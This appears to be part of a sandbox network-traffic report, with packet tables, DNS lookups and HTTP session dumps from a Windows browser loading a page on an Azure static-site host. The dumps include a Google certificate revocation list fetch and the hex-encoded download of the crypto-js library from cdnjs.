                                Apr 28, 2025 06:34:36.600112915 CEST44349702192.178.49.196192.168.2.5
                                Apr 28, 2025 06:34:36.600172997 CEST49702443192.168.2.5192.178.49.196
                                Apr 28, 2025 06:34:36.842869997 CEST49702443192.168.2.5192.178.49.196
                                Apr 28, 2025 06:34:36.842900038 CEST44349702192.178.49.196192.168.2.5
                                Apr 28, 2025 06:34:37.587785006 CEST49675443192.168.2.52.23.227.208
                                Apr 28, 2025 06:34:37.587824106 CEST443496752.23.227.208192.168.2.5
                                Apr 28, 2025 06:34:37.588171005 CEST49675443192.168.2.52.23.227.208
                                Apr 28, 2025 06:34:37.588182926 CEST443496752.23.227.208192.168.2.5
                                Apr 28, 2025 06:34:37.941122055 CEST49731443192.168.2.5150.171.28.254
                                Apr 28, 2025 06:34:37.941170931 CEST44349731150.171.28.254192.168.2.5
                                Apr 28, 2025 06:34:37.942217112 CEST49731443192.168.2.5150.171.28.254
                                Apr 28, 2025 06:34:37.946129084 CEST49731443192.168.2.5150.171.28.254
                                Apr 28, 2025 06:34:37.946144104 CEST44349731150.171.28.254192.168.2.5
                                Apr 28, 2025 06:34:38.391141891 CEST44349731150.171.28.254192.168.2.5
                                Apr 28, 2025 06:34:38.391244888 CEST49731443192.168.2.5150.171.28.254
                                Apr 28, 2025 06:34:38.819708109 CEST49676443192.168.2.520.189.173.14
                                Apr 28, 2025 06:35:24.393366098 CEST4969980192.168.2.5192.178.49.195
                                Apr 28, 2025 06:35:24.541410923 CEST8049699192.178.49.195192.168.2.5
                                Apr 28, 2025 06:35:24.541464090 CEST4969980192.168.2.5192.178.49.195
                                Apr 28, 2025 06:35:26.196293116 CEST49737443192.168.2.5192.178.49.196
                                Apr 28, 2025 06:35:26.196352959 CEST44349737192.178.49.196192.168.2.5
                                Apr 28, 2025 06:35:26.196470976 CEST49737443192.168.2.5192.178.49.196
                                Apr 28, 2025 06:35:26.196671963 CEST49737443192.168.2.5192.178.49.196
                                Apr 28, 2025 06:35:26.196685076 CEST44349737192.178.49.196192.168.2.5
                                Apr 28, 2025 06:35:26.511470079 CEST44349737192.178.49.196192.168.2.5
                                Apr 28, 2025 06:35:26.512556076 CEST49737443192.168.2.5192.178.49.196
                                Apr 28, 2025 06:35:26.512578011 CEST44349737192.178.49.196192.168.2.5
                                Apr 28, 2025 06:35:36.531168938 CEST44349737192.178.49.196192.168.2.5
                                Apr 28, 2025 06:35:36.531223059 CEST44349737192.178.49.196192.168.2.5
                                Apr 28, 2025 06:35:36.531352043 CEST49737443192.168.2.5192.178.49.196
                                Apr 28, 2025 06:35:36.670939922 CEST49737443192.168.2.5192.178.49.196
                                Apr 28, 2025 06:35:36.670972109 CEST44349737192.178.49.196192.168.2.5
                                TimestampSource PortDest PortSource IPDest IP
                                Apr 28, 2025 06:34:22.052324057 CEST53614091.1.1.1192.168.2.5
                                Apr 28, 2025 06:34:22.077948093 CEST53586161.1.1.1192.168.2.5
                                Apr 28, 2025 06:34:23.228666067 CEST53522501.1.1.1192.168.2.5
                                Apr 28, 2025 06:34:24.441167116 CEST53528171.1.1.1192.168.2.5
                                Apr 28, 2025 06:34:26.133292913 CEST5377653192.168.2.51.1.1.1
                                Apr 28, 2025 06:34:26.133490086 CEST6074853192.168.2.51.1.1.1
                                Apr 28, 2025 06:34:26.273940086 CEST53537761.1.1.1192.168.2.5
                                Apr 28, 2025 06:34:26.273967981 CEST53607481.1.1.1192.168.2.5
                                Apr 28, 2025 06:34:28.381608963 CEST5074353192.168.2.51.1.1.1
                                Apr 28, 2025 06:34:28.381860971 CEST6283353192.168.2.51.1.1.1
                                Apr 28, 2025 06:34:28.521945953 CEST53507431.1.1.1192.168.2.5
                                Apr 28, 2025 06:34:28.522347927 CEST53628331.1.1.1192.168.2.5
                                Apr 28, 2025 06:34:29.501548052 CEST6510953192.168.2.51.1.1.1
                                Apr 28, 2025 06:34:29.501733065 CEST5602953192.168.2.51.1.1.1
                                Apr 28, 2025 06:34:29.506448030 CEST5209553192.168.2.51.1.1.1
                                Apr 28, 2025 06:34:29.506639957 CEST5423053192.168.2.51.1.1.1
                                Apr 28, 2025 06:34:29.642227888 CEST53560291.1.1.1192.168.2.5
                                Apr 28, 2025 06:34:29.643116951 CEST53651091.1.1.1192.168.2.5
                                Apr 28, 2025 06:34:29.650463104 CEST53542301.1.1.1192.168.2.5
                                Apr 28, 2025 06:34:29.650547981 CEST53520951.1.1.1192.168.2.5
                                Apr 28, 2025 06:34:30.432194948 CEST5342253192.168.2.51.1.1.1
                                Apr 28, 2025 06:34:30.432420015 CEST5687053192.168.2.51.1.1.1
                                Apr 28, 2025 06:34:30.574112892 CEST53534221.1.1.1192.168.2.5
                                Apr 28, 2025 06:34:30.577529907 CEST53568701.1.1.1192.168.2.5
                                Apr 28, 2025 06:34:31.719012022 CEST53581631.1.1.1192.168.2.5
                                Apr 28, 2025 06:34:41.587167025 CEST53641821.1.1.1192.168.2.5
                                Apr 28, 2025 06:35:00.519393921 CEST53631181.1.1.1192.168.2.5
                                Apr 28, 2025 06:35:21.840959072 CEST53525811.1.1.1192.168.2.5
                                Apr 28, 2025 06:35:22.841226101 CEST138138192.168.2.5192.168.2.255
                                Apr 28, 2025 06:35:23.273479939 CEST53613921.1.1.1192.168.2.5
                                Apr 28, 2025 06:35:23.654398918 CEST53516731.1.1.1192.168.2.5
                                Apr 28, 2025 06:35:24.350091934 CEST53649041.1.1.1192.168.2.5
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Apr 28, 2025 06:34:26.133292913 CEST192.168.2.51.1.1.10x4c53Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:26.133490086 CEST192.168.2.51.1.1.10x467bStandard query (0)www.google.com65IN (0x0001)false
                                Apr 28, 2025 06:34:28.381608963 CEST192.168.2.51.1.1.10x37ccStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:28.381860971 CEST192.168.2.51.1.1.10x7378Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                Apr 28, 2025 06:34:29.501548052 CEST192.168.2.51.1.1.10x92baStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:29.501733065 CEST192.168.2.51.1.1.10xabdbStandard query (0)code.jquery.com65IN (0x0001)false
                                Apr 28, 2025 06:34:29.506448030 CEST192.168.2.51.1.1.10xc10fStandard query (0)github.comA (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:29.506639957 CEST192.168.2.51.1.1.10xf731Standard query (0)github.com65IN (0x0001)false
                                Apr 28, 2025 06:34:30.432194948 CEST192.168.2.51.1.1.10x1145Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:30.432420015 CEST192.168.2.51.1.1.10xd9deStandard query (0)objects.githubusercontent.com65IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Apr 28, 2025 06:34:26.273940086 CEST1.1.1.1192.168.2.50x4c53No error (0)www.google.com192.178.49.196A (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:26.273967981 CEST1.1.1.1192.168.2.50x467bNo error (0)www.google.com65IN (0x0001)false
                                Apr 28, 2025 06:34:28.521945953 CEST1.1.1.1192.168.2.50x37ccNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:28.521945953 CEST1.1.1.1192.168.2.50x37ccNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:28.522347927 CEST1.1.1.1192.168.2.50x7378No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                Apr 28, 2025 06:34:29.643116951 CEST1.1.1.1192.168.2.50x92baNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:29.643116951 CEST1.1.1.1192.168.2.50x92baNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:29.643116951 CEST1.1.1.1192.168.2.50x92baNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:29.643116951 CEST1.1.1.1192.168.2.50x92baNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:29.650547981 CEST1.1.1.1192.168.2.50xc10fNo error (0)github.com140.82.114.4A (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:30.574112892 CEST1.1.1.1192.168.2.50x1145No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:30.574112892 CEST1.1.1.1192.168.2.50x1145No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:30.574112892 CEST1.1.1.1192.168.2.50x1145No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:30.574112892 CEST1.1.1.1192.168.2.50x1145No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:30.614599943 CEST1.1.1.1192.168.2.50x3e23No error (0)shed.dual-low.s-part-0043.t-0009.t-msedge.nets-part-0043.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Apr 28, 2025 06:34:30.614599943 CEST1.1.1.1192.168.2.50x3e23No error (0)s-part-0043.t-0009.t-msedge.net13.107.246.71A (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:31.481782913 CEST1.1.1.1192.168.2.50x4fedNo error (0)shed.dual-low.s-part-0043.t-0009.t-msedge.nets-part-0043.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Apr 28, 2025 06:34:31.481782913 CEST1.1.1.1192.168.2.50x4fedNo error (0)s-part-0043.t-0009.t-msedge.net13.107.246.71A (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:31.643934011 CEST1.1.1.1192.168.2.50x9cb0No error (0)shed.dual-low.s-part-0043.t-0009.t-msedge.nets-part-0043.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Apr 28, 2025 06:34:31.643934011 CEST1.1.1.1192.168.2.50x9cb0No error (0)s-part-0043.t-0009.t-msedge.net13.107.246.71A (IP address)IN (0x0001)false
                                Apr 28, 2025 06:34:32.924948931 CEST1.1.1.1192.168.2.50x154dNo error (0)shed.dual-low.s-part-0043.t-0009.t-msedge.nets-part-0043.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Apr 28, 2025 06:34:32.924948931 CEST1.1.1.1192.168.2.50x154dNo error (0)s-part-0043.t-0009.t-msedge.net13.107.246.71A (IP address)IN (0x0001)false
                                • 8734873478934795494.z9.web.core.windows.net
                                  • cdnjs.cloudflare.com
                                  • code.jquery.com
                                  • github.com
                                  • objects.githubusercontent.com
                                • c.pki.goog
                                Session IDSource IPSource PortDestination IPDestination Port
                                0192.168.2.549699192.178.49.19580
                                TimestampBytes transferredDirectionData
                                Apr 28, 2025 06:34:24.031250000 CEST200OUTGET /r/r4.crl HTTP/1.1
                                Cache-Control: max-age = 3000
                                Connection: Keep-Alive
                                Accept: */*
                                If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                User-Agent: Microsoft-CryptoAPI/10.0
                                Host: c.pki.goog
                                Apr 28, 2025 06:34:24.179697037 CEST1243INHTTP/1.1 200 OK
                                Accept-Ranges: bytes
                                Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                Cross-Origin-Resource-Policy: cross-origin
                                Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                Content-Length: 530
                                X-Content-Type-Options: nosniff
                                Server: sffe
                                X-XSS-Protection: 0
                                Date: Mon, 28 Apr 2025 04:10:42 GMT
                                Expires: Mon, 28 Apr 2025 05:00:42 GMT
                                Cache-Control: public, max-age=3000
                                Age: 1422
                                Last-Modified: Thu, 03 Apr 2025 14:18:00 GMT
                                Content-Type: application/pkix-crl
                                Vary: Accept-Encoding
                                Data Raw: 30 82 02 0e 30 82 01 93 02 01 01 30 0a 06 08 2a 86 48 ce 3d 04 03 03 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 14 30 12 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 34 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 17 0d 32 36 30 32 32 38 30 37 35 39 35 39 5a 30 81 e9 30 2f 02 10 6e 47 a9 ce 4f 46 c2 3d e2 49 ea cc 38 94 53 73 17 0d 31 39 30 39 33 30 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 f0 9c 5b 70 05 a6 dc 86 e2 f9 9e f3 17 0d 32 30 30 31 33 31 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 fe a5 81 44 7e 3b fd 3b b8 1c 24 98 17 0d 32 33 30 36 31 33 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 16 68 25 e1 70 04 40 61 24 91 f5 40 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 00 8e b2 58 e7 b5 94 0c 1f f9 00 44 17 0d 32 35 30 [TRUNCATED]
                                Data Ascii: 000*H=0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R4250403080000Z260228075959Z00/nGOF=I8Ss190930000000Z00U0,[p200131000000Z00U0,D~;;$230613000000Z00U0,h%p@a$@250403080000Z00U0,XD250403080000Z00U/0-0U0U#0LtI6>j0*H=i0f1>2en:IN@g=;bQZ~`NX1?^4y[$\4{;$zDeU6O


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549705104.17.25.144436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-04-28 04:34:28 UTC630OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                Host: cdnjs.cloudflare.com
                                Connection: keep-alive
                                sec-ch-ua-platform: "Windows"
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                sec-ch-ua-mobile: ?0
                                Accept: */*
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: script
                                Sec-Fetch-Storage-Access: active
                                Referer: https://8734873478934795494.z9.web.core.windows.net/
                                Accept-Encoding: gzip, deflate, br, zstd
                                Accept-Language: en-US,en;q=0.9
                                2025-04-28 04:34:29 UTC970INHTTP/1.1 200 OK
                                Date: Mon, 28 Apr 2025 04:34:29 GMT
                                Content-Type: application/javascript; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Server: cloudflare
                                Strict-Transport-Security: max-age=15780000
                                Cf-Ray: 9373d8f3af86a0c3-PHX
                                Access-Control-Allow-Origin: *
                                Cache-Control: public, max-age=30672000
                                Etag: W/"61182885-40eb"
                                Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                Cf-Cdnjs-Via: cfworker/kv
                                Cross-Origin-Resource-Policy: cross-origin
                                Timing-Allow-Origin: *
                                X-Content-Type-Options: nosniff
                                Cf-Cache-Status: HIT
                                Age: 667502
                                Expires: Sat, 18 Apr 2026 04:34:29 GMT
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1zUYW3wFhzvqwUbZ%2Fyu%2BLlw0bFU3p4HoMxk%2BLg%2B%2FS5DAi9xQIuNOEF0zENUZmxGdgV2E2mTs9CKI%2BTH9RKLqW0sX8qUGYXiXrNaapV1ev3K7xpXwwkzO%2F4z0H%2BKZmqX%2BjwtIk6bl"}],"group":"cf-nel","max_age":604800}
                                Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                alt-svc: h3=":443"; ma=86400
                                2025-04-28 04:34:29 UTC399INData Raw: 35 66 66 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                Data Ascii: 5ffa!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                2025-04-28 04:34:29 UTC1369INData Raw: 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72
                                Data Ascii: ned"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r
                                2025-04-28 04:34:29 UTC1369INData Raw: 20 74 3d 6f 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e
                                Data Ascii: t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.
                                2025-04-28 04:34:29 UTC1369INData Raw: 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28
                                Data Ascii: string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(
                                2025-04-28 04:34:29 UTC1369INData Raw: 6f 6e 20 4e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e
                                Data Ascii: on N(){for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>
                                2025-04-28 04:34:29 UTC1369INData Raw: 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49
                                Data Ascii: 7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I
                                2025-04-28 04:34:29 UTC1369INData Raw: 72 61 79 28 74 2e 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b
                                Data Ascii: ray(t.buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={
                                2025-04-28 04:34:29 UTC1369INData Raw: 6e 3b 76 61 72 20 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45
                                Data Ascii: n;var o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDE
